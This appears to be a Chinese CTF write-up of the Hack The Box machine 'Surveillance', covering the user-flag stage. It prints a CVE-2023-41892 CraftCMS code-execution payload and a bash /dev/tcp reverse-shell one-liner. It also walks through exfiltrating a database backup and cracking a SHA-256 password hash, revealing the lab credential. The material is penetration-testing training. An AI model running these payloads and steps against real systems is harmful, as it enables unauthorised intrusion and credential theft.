[渗透测试] HTB_Surveillance WriteUp [上]

---

 靶机：Surveillance (from Hack The Box)

 工具：Kali Linux

 目标：拿到user和root的一串32位hex字符串

---

## 配置hosts

　　环境启动后，要设置一下hosts的映射关系，把IP与域名写入/etc/hosts里，不然无法打开环境。

 

## 信息搜集

　　#1 打开站点进行了以下尝试：

　　　　1）nmap扫描端口

　　　　

　　　　2）dirsearch扫描文件目录

　　　　

　　#2 发现目标仅开放22和80端口，存在admin目录，其它目录访问过后暂未发现用处。于是尝试访问http://surveillance.htb/admin。搜集到系统指纹信息，是一套CraftCMS系统。

　　　　

　　　　期间进行过密码爆破，但是没用，随后去网上搜一下看看有没有可用的nday。

## 漏洞利用，GetSHELL

　　　　参考文章：CVE-2023-41892 CraftCMS远程代码命令执行漏洞利用分析。发现这套系统存在可利用的RCE，经过测试，相关漏洞存在：

　　　　POST方式提交：action=conditions/render&configObject=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\GuzzleHttp\\Psr7\\FnStream","__construct()":[{"close":null}],"_fn_close":"phpinfo"}}

　　　　

　　　　在GitHub上也找到可以利用的脚本，于是利用前辈写好的exp直接打（exp链接）并拿到了shell。

 

　　然后把shell反弹到自己机器上，不然容易断，也更容易进行操作：bash -c "bash -i >& /dev/tcp/xxxx/12345 0>&1"。

## 后渗透---信息搜集

　　因为我们拿到的shell还不是user或者root，只是一个www-data，所以现在要寻找能拿到user有关的信息。

　　　　1）访问/etc/passwd，发现有俩可能是我们要用到的：matthew和zoneminder

　　　　2）逛一圈儿网站目录文件，发现/var/www/html/craft/storage/backups路径下有一个sql备份包

　　　　肯定是想要尝试下下来看一下，所以我把这个包复制到/var/www/html/craft/web下并改名为1.zip，这样就可以直接访问http://surveillance.htb/1.zip获得这个压缩包了。打开之后搜索matthew就找到了和其相关的内容：

　　　　这是一条sql插入语句，通过表users和相应字段，可以大致判断这一条语句内的信息就是关于我们所要找的user，其中有一串疑似密码的东西（39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec），但具体是什么加密类型我们不知道，查阅资料可以利用hash-identifier（kali自带）来查询：

　　　　看样子应该是SHA-256，但是咋解？？？查询资料，尝试用hashcat来进行爆破，-m 1400 表示进行SHA-256类型爆破，把那串密文保存到一个文档中（我的是code.txt）并结合kali自带的字典/usr/share/wordlists/rockyou.txt（我的需要先从rockyou.txt.gz解压出来才能用）。因为之前解过了，后面加上--show参数看解的密码。

 ## 拿到user-matthew的flag

　　我们拿到了用户名：matthew和密码starcraft122490，那么直接ssh进行连接，拿到用户matthew的shell

　　至此，拿到user的flag

---

root权限的获得还在研究中~